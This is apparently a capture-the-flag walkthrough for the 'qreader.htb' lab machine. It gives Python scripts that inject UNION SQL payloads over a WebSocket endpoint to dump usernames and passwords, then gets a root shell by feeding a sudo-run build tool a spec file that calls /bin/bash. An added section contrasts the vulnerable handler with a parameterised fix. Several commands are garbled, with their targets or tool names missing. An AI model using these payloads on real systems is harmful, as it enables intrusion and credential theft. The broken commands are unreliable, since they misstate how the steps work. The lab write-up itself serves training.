Machine Link :

Machine IP :


Nmap Result

sudo nmap -sV -sC -A

Scan Result:

22/tcp open: ssh

80/tcp open: http

5789/tcp open: WebSocket service

Let's run a vulnerability scan of the WebSocket service on port 5789 with STEWS.

python3 -1 -n -u

STEWS reports a vulnerable WebSocket URL: ws://qreader.htb:5789

Browsing Website :

Now add qreader.htb to /etc/hosts.

Now open http://qreader.htb/ in your browser.

This website lets us generate and scan QR codes.

It also offers the client software for Windows and Linux, so let's download the .exe file and extract it with pyinstxtractor.

python3 qreader.exe

Now go to the extracted folder and examine the qreader.pyc file.

pip3 install uncompyle6

uncompyle6 qreader.pyc >

After analyzing the decompiled source we found the vulnerability, as shown below.

Let's write a Python script to exploit the SQL injection found in the source code above.

from websocket import create_connection  # pip3 install websocket-client
import json

ws_host = 'ws://qreader.htb:5789'
# Closes the double-quoted version string and UNIONs the answers table into the result
VERSION = '0.0.3" UNION SELECT group_concat(answer),"2","3","4" FROM answers;-- -'

ws = create_connection(ws_host + '/version')
ws.send(json.dumps({'version': VERSION}))
result = ws.recv()
ws.close()
print(result)

The above code prints all the users, as shown below.

Let's write a script to print the users' passwords.

from websocket import create_connection  # pip3 install websocket-client
import json

ws_host = 'ws://qreader.htb:5789'
# Same injection point, this time selecting username and password from the users table
VERSION = '0.0.3" UNION SELECT username,password,"3","4" from users;-- -'

ws = create_connection(ws_host + '/version')
ws.send(json.dumps({'version': VERSION}))
result = ws.recv()
ws.close()
print(result)
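The following is an added example, not code from the box or from this walkthrough's author, that reconstructs the bug pattern behind the /version injection and puts it beside a hardened handler. The table names, the four-column layout, the single-quoted query and every row in the in-memory SQLite database are constructed assumptions chosen so that a payload of the same shape as the one above lines up (the target's query used double quotes); the version-format allowlist is an added mitigation the page does not describe. Running it shows the vulnerable handler returning user rows for the UNION payload while the fixed handler treats the same string as an ordinary, non-matching version.

```python
import json
import re
import sqlite3

# Constructed schema and rows (assumptions, not taken from the target): four
# columns in both tables so the UNION payload's column count matches.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE versions (id INTEGER, version TEXT, released TEXT, changelog TEXT)")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT, role TEXT)")
    conn.executemany("INSERT INTO versions VALUES (?, ?, ?, ?)", [
        (1, "0.0.1", "2022-01-01", "initial release"),
        (2, "0.0.2", "2022-06-01", "bug fixes"),
    ])
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", [
        (1, "alice", "hash-of-alice", "admin"),
        (2, "bob", "hash-of-bob", "user"),
    ])
    conn.commit()
    return conn

def make_message(version):
    """Build the JSON frame a client sends to the /version endpoint."""
    return json.dumps({"version": version})

# Same shape as the walkthrough's payload, with single quotes to match the
# constructed handler's quoting (the page's target used double quotes).
INJECTION_PAYLOAD = "0.0.3' UNION SELECT username,password,'3','4' FROM users;-- -"

def version_lookup_vulnerable(conn, message):
    """Interpolates the client-controlled version straight into the SQL text,
    so everything after the closing quote is parsed as part of the statement."""
    version = json.loads(message)["version"]
    query = "SELECT * FROM versions WHERE version = '%s'" % version
    return sorted(conn.execute(query).fetchall())

# Allowlist for the only input shape the endpoint should ever accept.
VERSION_RE = re.compile(r"^\d+\.\d+\.\d+$")

def version_lookup_fixed(conn, message):
    """Hardened handler: reject anything that is not a dotted version, then
    bind the value as a parameter so the database never parses it as SQL."""
    version = json.loads(message).get("version", "")
    if not isinstance(version, str) or not VERSION_RE.match(version):
        return []  # malformed input never reaches the database
    rows = conn.execute("SELECT * FROM versions WHERE version = ?", (version,)).fetchall()
    return sorted(rows)

def demo():
    """Run both handlers on a benign request and on the injection payload."""
    conn = build_db()
    benign = make_message("0.0.2")
    hostile = make_message(INJECTION_PAYLOAD)
    results = {
        "vulnerable_benign": version_lookup_vulnerable(conn, benign),
        "vulnerable_hostile": version_lookup_vulnerable(conn, hostile),
        "fixed_benign": version_lookup_fixed(conn, benign),
        "fixed_hostile": version_lookup_fixed(conn, hostile),
    }
    conn.close()
    return results

if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, rows)
```

The parameterised query alone closes the injection; the allowlist is a second layer that also gives a clean place to log and alert on malformed version strings, which is the detection signal a defender would want from this endpoint.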

As you can see, we got the password, and we can decrypt it on the website shown below.

Now it's time to log in via SSH.

Now copy your user flag.

Run sudo -l to see which commands we can run as root without a password.

Commands used:

echo 'import os;os.system("/bin/bash")' > root.spec

sudo /usr/local/sbin/ build root.spec

As you can see, we got our root flag.

Thank you for reading.



